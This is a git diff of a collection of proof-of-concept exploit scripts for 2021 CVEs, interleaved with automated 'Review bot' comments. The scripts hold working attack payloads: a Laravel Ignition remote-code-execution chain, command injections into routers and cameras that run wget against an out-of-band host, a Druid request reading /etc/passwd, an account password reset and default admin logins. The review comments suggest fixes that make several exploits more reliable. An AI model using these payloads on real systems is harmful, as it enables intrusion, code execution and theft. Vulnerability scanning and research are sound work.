- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp1.status_code == 201) and ("""X-Auth-Token""" in str(resp1.headers) and """PasswordReset""" in str(resp1.headers) and """Location""" in str(resp1.headers)) and ("""Base.1.0.Created""" in resp1.text):
result["success"] = True
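Review bot: `"{randstr}".format(randstr=randstr)` on both `+ data =` lines is a no-op wrapper around a value that is already a string; `data = {"Password": randstr}` and `data = {"UserName": "Administrator", "Password": randstr}` say the same thing and avoid a `.format` call that would break on a brace in the value. The first request is a PATCH that changes state on the target (it sets a new password), which the file should call out in `poc`'s docstring or a comment such as `# state-changing: resets the account password, not a read-only check` so operators do not run it as a passive probe. `poc` continues outside the hunk.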
@@ -71,4 +74,7 @@ def format_url(url):
url = 'http://' + url
url = url.rstrip('/')
- return url
\ No newline at end of file
+ return url
+
+def gen_randstr(length):
+ return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))
\ No newline at end of file
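Review bot: `gen_randstr` draws from `random.choice`, a non-cryptographic PRNG; since the string it produces is used as a credential written to a device, it should come from `secrets.choice` over the same alphabet, i.e. `return ''.join(secrets.choice(string.ascii_letters + string.digits) for _ in range(length))` with `import secrets` in place of the `random` import added in the first hunk. The function is also appended without a trailing newline (`\ No newline at end of file` persists) and has no docstring; `"""Return a random alphanumeric string of *length* characters."""` would do.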
diff --git a/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py b/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py
index 83613157f..ce479b287 100644
--- a/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py
+++ b/2021/CVE-2021-3129/poc/pocsploit/CVE-2021-3129.py
@@ -38,39 +38,39 @@ def poc(url):
path = """/_ignition/execute-solution"""
method = "POST"
- data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}"""
+ data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
- data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}"""
+ data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp1 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
- data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}"""
+ data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "AA"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp2 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp2 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
- data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41
=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}"""
+ data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "=50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=6F=00=4C=00=41=00=51=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=41=00=41=00=41=00=41=00=54=00=7A=00=6F=00=30=00=4D=00=44=00=6F=00=69=00=53=00=57=00=78=00=73=00=64=00=57=00=31=00=70=00=62=00=6D=00=46=00=30=00=5A=00=56=00=78=00=43=00=63=00=6D=00=39=00=68=00=5A=00=47=00=4E=00=68=00=63=00=33=00=52=00=70=00=62=00=6D=00=64=00=63=00=55=00=47=00=56=00=75=00=5A=00=47=00=6C=00=75=00=5A=00=30=00=4A=00=79=00=62=00=32=00=46=00=6B=00=59=00=32=00=46=00=7A=00=64=00=43=00=49=00=36=00=4D=00=6A=00=70=00=37=00=63=00=7A=00=6F=00=35=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=6C=00=64=00=6D=00=56=00=75=00=64=00=48=00=4D=00=69=00=4F=00=30=00=38=00=36=00=4D=00=7A=00=45=00=36=00=49=00=6B=00=6C=00=73=00=62=00=48=00=56=00=74=00=61=00=57=00=35=00=68=00=64=00=47=00=56=00=63=00=56=00=6D=00=46=00=73=00=61=00=57=00=52=00=68=00=64=00=47=00=6C=00=76=00=62=00=6C=00=78=00=57=00=59=00=57=00=78=00=70=00=5A=00=47=00=46=00=30=00=62=00=33=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=6D=00=56=00=34=00=64=00=47=00=56=00=75=00=63=00=32=00=6C=00=76=00=62=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=54=00=70=00=37=00=63=00=7A=00=6F=00=77=00=4F=00=69=00=49=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=6A=00=6F=00=69=00=63=00=33=00=6C=00=7A=00=64=00=47=00=56=00=74=00=49=00=6A=00=74=00=39=00=66=00=58=00=4D=00=36=00=4F=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=5A=00=58=00=5A=00=6C=00=62=00=6E=00=51=00=69=00=4F=00=33=00=4D=00=36=00=4D=00=6A=00=6F=00=69=00=61=00=57=00=51=00=69=00=4F=00=33=00=30=00=46=00=41=00
=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=58=00=73=00=7A=00=6F=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=43=00=7A=00=64=00=47=00=56=00=7A=00=64=00=48=00=52=00=6C=00=63=00=33=00=51=00=63=00=4A=00=39=00=59=00=36=00=5A=00=6B=00=50=00=61=00=39=00=61=00=45=00=49=00=51=00=49=00=45=00=47=00=30=00=6B=00=4A=00=2B=00=39=00=4A=00=50=00=6B=00=4C=00=67=00=49=00=41=00=41=00=41=00=42=00=48=00=51=00=6B=00=31=00=43=00a"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp3 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp3 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
- data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}"""
+ data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp4 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp4 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/_ignition/execute-solution"""
method = "POST"
- data = """{"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}"""
+ data = {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "cve20213129", "viewFile": "phar://../storage/logs/laravel.log/test.txt"}}
headers = {'Accept': 'application/json', 'Content-Type': 'application/json'}
- resp5 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp5 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (resp5.status_code == 500) and ("""uid=""" in resp5.text and """gid=""" in resp5.text and """groups=""" in resp5.text and """Illuminate""" in resp5.text):
result["success"] = True
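Review bot: The long quoted-printable `viewFile` value on the fourth `+ data =` line appears to span two physical lines; if that break is real in the file rather than a display wrap, the new plain `"..."` literal is a SyntaxError where the old triple-quoted string tolerated the newline (and would have sent it as part of the payload). Worth confirming the file parses, e.g. with `python -m py_compile`. Independently, the first two requests (resp0/resp1) send byte-identical bodies; if the repetition is intentional, a one-line comment such as `# sent twice on purpose` would save the next reader from deduplicating it. The enclosing `poc` body starts outside the hunk.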
diff --git a/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py b/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py
index 5e2576a76..a2220d60f 100644
--- a/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py
+++ b/2021/CVE-2021-31755/poc/pocsploit/CVE-2021-31755.py
@@ -42,7 +42,7 @@ def poc(url):
path = """/goform/setmac"""
method = "POST"
- data = """module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://oob_domain&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static"""
+ data = """module1=wifiBasicCfg&doubleBandUnityEnable=false&wifiTotalEn=true&wifiEn=true&wifiSSID=Tenda_B0E040&mac=wget+http://{oob_domain}&wifiSecurityMode=WPAWPA2%2FAES&wifiPwd=Password12345&wifiHideSSID=false&wifiEn_5G=true&wifiSSID_5G=Tenda_B0E040_5G&wifiSecurityMode_5G=WPAWPA2%2FAES&wifiPwd_5G=Password12345&wifiHideSSID_5G=false&module2=wifiGuest&guestEn=false&guestEn_5G=false&guestSSID=Tenda_VIP&guestSSID_5G=Tenda_VIP_5G&guestPwd=&guestPwd_5G=&guestValidTime=8&guestShareSpeed=0&module3=wifiPower&wifiPower=high&wifiPower_5G=high&module5=wifiAdvCfg&wifiMode=bgn&wifiChannel=auto&wifiBandwidth=auto&wifiMode_5G=ac&wifiChannel_5G=auto&wifiBandwidth_5G=auto&wifiAntijamEn=false&module6=wifiBeamforming&wifiBeaformingEn=true&module7=wifiWPS&wpsEn=true&wanType=static""".format(oob_domain=oob_domain)
headers = {'Content-Type': 'application/x-www-form-urlencoded'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
diff --git a/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py b/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py
index 4e8f70a79..39637975b 100644
--- a/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py
+++ b/2021/CVE-2021-32305/poc/pocsploit/CVE-2021-32305.py
@@ -40,7 +40,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/search.php?search=%22;wget+http%3A%2F%2Foob_domain%27;%22"""
+ path = """/search.php?search=%22;wget+http%3A%2F%2F{oob_domain}%27;%22""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*'}
diff --git a/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py b/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py
index fc530a07a..ce39e2627 100644
--- a/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py
+++ b/2021/CVE-2021-33544/poc/pocsploit/CVE-2021-33544.py
@@ -39,7 +39,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://oob_domain)&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything"""
+ path = """//uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{oob_domain})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'}
diff --git a/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py b/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py
index 27b6700c6..0fb34601e 100644
--- a/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py
+++ b/2021/CVE-2021-34640/poc/pocsploit/CVE-2021-34640.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
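Review bot: The new `.format(username=username, password=password)` splices the credentials into an `application/x-www-form-urlencoded` body without encoding them, so a real password containing `&`, `=`, `+`, `%` or `#` gets split or mis-decoded by wp-login.php and the login fails silently — harmless for the hard-coded `admin`/`admin`, wrong the moment someone substitutes working credentials. Build the body with the standard helper instead: `data = urlencode({"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})`, with `from urllib.parse import urlencode` added at the top of the file (outside this hunk). A short comment above the two new assignments noting that they are WordPress default-credential assumptions, and that a rejected login presumably surfaces as `success: False` just like an unaffected target, would save the next user some confusion. `poc()` continues past this hunk.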
diff --git a/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py b/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py
index 67dcdf456..9f46c0ec2 100644
--- a/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py
+++ b/2021/CVE-2021-34643/poc/pocsploit/CVE-2021-34643.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
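Review bot: `username` and `password` are interpolated into the form body with plain `str.format` and no URL-encoding, so any credential containing a reserved form character (`&`, `=`, `+`, `%`, `#`) corrupts the request and the login silently fails, which the rest of `poc()` presumably reports as not-vulnerable. The fix is one line: `data = urlencode({"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})` (needs `from urllib.parse import urlencode` in the import block above this hunk). Consider also a comment on the two new assignments making clear they are a default-credential guess, not something the vulnerability requires. The enclosing `poc()` ends outside this hunk.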
diff --git a/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py b/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py
index 4161ad8c5..40c44c73d 100644
--- a/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py
+++ b/2021/CVE-2021-3577/poc/pocsploit/CVE-2021-3577.py
@@ -40,7 +40,7 @@ def poc(url):
oob_domain,flag = gen_oob_domain()
- path = """/?action=command&command=set_city_timezone&value=$(wget%20http://oob_domain))"""
+ path = """/?action=command&command=set_city_timezone&value=$(wget%20http://{oob_domain}))""".format(oob_domain=oob_domain)
method = "GET"
data = """"""
headers = {'Accept': '*/*'}
diff --git a/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py b/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py
index 1e683b524..ebc56d73e 100644
--- a/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py
+++ b/2021/CVE-2021-36380/poc/pocsploit/CVE-2021-36380.py
@@ -41,7 +41,7 @@ def poc(url):
path = """/cgi/networkDiag.cgi"""
method = "POST"
- data = """command=2&ipAddr=&dnsAddr=$(wget+http://oob_domain)&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize="""
+ data = """command=2&ipAddr=&dnsAddr=$(wget+http://{oob_domain})&interface=0&netType=0&scrFilter=&dstFilter=&fileSave=false&pcapSave=false&fileSize=""".format(oob_domain=oob_domain)
headers = {}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
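Review bot: `headers = {}` on the line after the new `data` means this POST goes out without a `Content-Type` — `requests` does not add one for a `str` body — so the CGI has to guess that the body is form-encoded before `$(wget+http://…)` ever reaches `dnsAddr`; the sibling PoCs in this diff send `'Content-Type': 'application/x-www-form-urlencoded'` explicitly and this one should too. Note that the `+` in `wget+http` only becomes a space if the server form-decodes the body, which is another reason to declare the type. `poc()` starts before this hunk.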
diff --git a/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py b/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py
index 68e43d2e2..35b69979f 100644
--- a/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py
+++ b/2021/CVE-2021-36749/poc/pocsploit/CVE-2021-36749.py
@@ -1,4 +1,5 @@
import requests
+import re
# Vuln Base Info
@@ -39,9 +40,9 @@ def poc(url):
path = """/druid/indexer/v1/sampler?for=connect"""
method = "POST"
- data = """{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}"""
+ data = {"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
headers = {'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
+ resp0 = requests.request(method=method,url=url+path,json=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if (re.search(r"""root:.*:0:0:""",resp0.text) or re.search(r"""druid:*:1000:1000:""",resp0.text)):
result["success"] = True
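Review bot: The detection regex on the last visible line, `r"""druid:*:1000:1000:"""`, cannot match a normal passwd entry: `:*` is "zero or more colons", so the pattern only matches `druid::1000:1000:` (empty password field) or `druid:1000:1000:`, never `druid:x:1000:1000:` — the intended form is `r"druid:.*:1000:1000:"` (or, stricter, `r"^druid:[^:]*:1000:1000:"` with `re.M`). The line is unchanged by this commit, but it only became executable once `import re` was added above, so it is worth fixing in the same change; today a positive result depends entirely on the `root:` alternative. The explicit `Content-Type` header is redundant now that `json=data` sets it, though harmless. The `if` body continues past the hunk.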
diff --git a/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py b/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py
index bd6cb0c77..58dbf72c0 100644
--- a/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py
+++ b/2021/CVE-2021-39322/poc/pocsploit/CVE-2021-39322.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
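Review bot: The rewritten `data` line puts `username`/`password` into a form body verbatim, so the request is only well-formed while both values avoid `&`, `=`, `+`, `%` and `#`; swap in a real password with one of those characters and wp-login.php sees a different (or truncated) credential and the PoC presumably reports `success: False`. Use `data = urlencode({"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})` and add `from urllib.parse import urlencode` to the import block outside this hunk. The two new assignments deserve a comment saying they are a default-credential guess rather than part of the vulnerability. `poc()` continues beyond this hunk.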
diff --git a/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py b/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py
index 9ffddd15a..d48e14e92 100644
--- a/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py
+++ b/2021/CVE-2021-39350/poc/pocsploit/CVE-2021-39350.py
@@ -33,6 +33,8 @@ def fingerprint(url):
# Proof of Concept
def poc(url):
result = {}
+ username = "admin"
+ password = "admin"
try:
url = format_url(url)
@@ -40,7 +42,7 @@ def poc(url):
path = """/wp-login.php"""
method = "POST"
- data = """log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1"""
+ data = """log={username}&pwd={password}&wp-submit=Log+In&testcookie=1""".format(username=username, password=password)
headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Cookie': 'wordpress_test_cookie=WP%20Cookie%20check'}
resp0 = s.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
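Review bot: Interpolating `username`/`password` with `str.format` into an `application/x-www-form-urlencoded` body skips percent-encoding, so reserved characters in a real password (`&`, `=`, `+`, `%`, `#`) break the form and the login fails without any visible error. One line fixes it: `data = urlencode({"log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1"})` plus `from urllib.parse import urlencode` at the top of the file (outside this hunk). A comment on the new `admin`/`admin` assignments noting that a wrong password here is indistinguishable from an unaffected target would also help. The rest of `poc()` lies outside the hunk.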
diff --git a/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py b/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py
index 25d3ec424..fd9a6de18 100644
--- a/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py
+++ b/2021/CVE-2021-41266/poc/pocsploit/CVE-2021-41266.py
@@ -39,9 +39,9 @@ def poc(url):
path = """/api/v1/login/oauth2/auth"""
method = "POST"
- data = """{"code":"test","state":"test"}"""
+ data = {"code":"test","state":"test"}
headers = {'Accept': '*/*', 'Content-Type': 'application/json'}
- resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
